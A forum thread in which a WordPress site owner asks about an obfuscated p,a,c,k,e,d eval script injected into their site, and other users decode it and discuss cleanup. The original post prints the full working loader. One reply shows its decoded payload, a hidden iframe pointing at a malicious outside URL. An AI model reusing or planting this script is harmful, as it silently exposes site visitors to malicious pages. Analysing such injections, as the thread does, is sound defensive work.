  • #1
    afa
    New to the CF scene
    Join Date
    Dec 2011
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    What does this code mean? Involves a function(p,a,c,k,e,d)

    So I like to think I'm pretty decent with web programming, but this code has me puzzled.
    Code:
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393470783b223e3c696672616d652077696474683d22343022206865696768743d22333022207372633d22687474703a2f2f3167323166736e32747062642e63652e6d732f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>
    I know it's evil code, I had to put it through a base 64 decode twice to get to this. But all that I'm really after is this: Is there any lingering harm on the website which had this live code? When one tries to create a link to the site (powered by WordPress, by the way) on Facebook, there is this error message:
    Code:
    Cannot modify header information - headers already sent by (output started at /home/content/xx/xxxxxxx/html/index.php(1) : eval()'d code:37) in /home/content/xx/xxxxxxx/html/wp-includes/pluggable.php on line 897
    Even though I've taken the code out from index.php and then functions.php after I spotted it there. Why is this error on FB still happening if this code cannot be found in the text files? Could there be something evil happening in the database?

    Any assistance would be most appreciated.

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    http://www.codeproject.com/KB/script...s_Decoder.aspx

    If you replace the opening eval( with document.write( ... all the code is dumped to the screen. If some of it is being interpreted as HTML rather than being displayed, consider forcing your document.write to write between <textarea></textarea> tags.


    All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.
    Last edited by Philip M; 12-15-2011 at 08:52 AM.

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #3
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    The main point of this seems to be to try to get you to bite on some supposedly free offers.

    The big long string of hex numbers turns out to be this:
    Code:
    <div style="position: absolute; left: -1993px; top: -2994px;">
        <iframe width="40" height="30" src="http://1g21fsn2tpbd.ce.ms/i.php?go=1">
        </iframe>
    </div>
    As you can see, that creates a <div> on your page that is way off the top left edge and so is effectively invisible.

    In the <div> it drops in an <iframe> with the "poison" URL. That URL immediately takes over the entire window (that is, it loads its own content into the _top window, replacing whatever was there) and starts trying to bombard you with offers.

    Not being foolish enough to click through to some of the offers, I can't guess what else they try to do. My guess would be that they try to get you to download something that will install itself as a virus or spyware on your machine. You are welcome to find out for yourself.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #4
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    The weird part of this is that the hex string there isn't even mildly encrypted. It's almost like they want people to break this open. Every other one like this I've seen, the hex values are at least encrypted with a simple substitution cipher. This one doesn't bother.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #5
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    Originally posted by Old Pedant:
    The main point of this seems to be to try to get you to bite on some supposedly free offers.
    The cheese in the mousetrap is always free!

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #6
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.
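
The analysis discussed in posts #2, #3 and #6, as an added example that is not part of any post in this thread: a static unpacker that rebuilds a p,a,c,k,e,d script by dictionary substitution instead of eval() or document.write(), then hex-decodes long hex literals and escapes the markup so it is displayed rather than rendered. The function names and the packed sample are constructed for illustration.

```javascript
// Added example (not from the thread): unpack a p,a,c,k,e,d wrapper statically.
// Nothing here calls eval() or document.write() on the untrusted script.

// Same token numbering the packer uses: base-`radix` digits 0-9, a-z, then A-Z.
function baseEncode(n, radix) {
  const head = n < radix ? '' : baseEncode(Math.floor(n / radix), radix);
  const digit = n % radix;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild the source by swapping each token for its dictionary word.
function unpack(payload, radix, count, words) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = baseEncode(i, radix);
    dict.set(token, words[i] || token); // empty slot: token stands for itself
  }
  return payload.replace(/\w+/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Decode a hex string to text; null if not an even-length run of hex digits.
function hexToText(hex) {
  if (!/^(?:[0-9a-f]{2})+$/i.test(hex)) return null;
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Escape markup so decoded text is displayed, never rendered.
function escapeHtml(text) {
  return text.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Unpack, then decode and escape every long hex literal in the result.
function analyze(payload, radix, count, words) {
  const source = unpack(payload, radix, count, words);
  const hexRuns = source.match(/\b(?:[0-9a-f]{2}){8,}\b/gi) || [];
  return { source, decoded: hexRuns.map((h) => escapeHtml(hexToText(h))) };
}

// Constructed sample: a harmless packed call whose hex word decodes to "<b>x</b>".
const sample = analyze("3 0='1';2(0)", 40, 4,
  'msg|3c623e783c2f623e|show|var'.split('|'));
console.log(sample.source);
console.log(sample.decoded);
```

The four arguments to analyze() are the ones passed to the packed function's trailing call: the payload string, the radix, the word count and the '|'-split word list.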

  • #7
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    Originally posted by Old Pedant:
    By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.
    Yes, I should have mentioned that!

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #8
    afa
    New to the CF scene
    Join Date
    Dec 2011
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thanks, Philip and Old Pedant! I had read that it was possible new pages had been added to the site if such code is implemented, but if that div is the result of the script, then perhaps not? I do wonder why I still have that FB message though with the above being removed several days ago.

  • #9
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    I don't see how it could *truly* add a new page to the site, as that would mean storing something on your server. And if you have done even a halfway decent job of locking down your server's directory, that shouldn't happen.

    What it *could* do is give the *appearance* of new pages. For example, it could locate a menu and tack on another menu item. That menu item's onclick would then be implemented via the code I showed that brings up a foreign site's window just as if it's part of your site.

    So maybe that's what it's referring to.

    But as to "that FB message"... I admit it does look like they seem to have figured a way to try to stick something in your page headers. The message results because, indeed, if you try to modify an HTML header and *ANY* HTML tags (even the <html> tag itself) have already been sent to the browser, then you can't do so. So it sounds like their attempted hack isn't happening, but you are seeing the vestiges of it in the form of that message.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #10
    Master Coder felgall's Avatar
    Join Date
    Sep 2005
    Location
    Sydney, Australia
    Posts
    6,642
    Thanks
    0
    Thanked 649 Times in 639 Posts
    The p,a,c,k,e,d function is generated by an early JavaScript compressor written by one of the top JavaScript experts. It was used quite often by major scripts up until a few years ago to make the script to be downloaded a lot smaller. Older versions of JQuery used to use it.

    In the last few years more and more people have support for HTTP 1.1 enabled and so that can be used to compress all files. This means that a minified version of a script compressed with HTTP 1.1 ends up being a smaller download than the p,a,c,k,e,d version without the need to have the JavaScript decompress itself in the browser. This effectively made p,a,c,k,e,d obsolete. Of course some people still use it simply because it conceals the code making it slightly harder to read.
    Stephen
    Learn Modern JavaScript - http://javascriptexample.net/
    Helping others to solve their computer problem at http://www.felgall.com/

    Don't forget to start your JavaScript code with "use strict"; which makes it easier to find errors in your code.

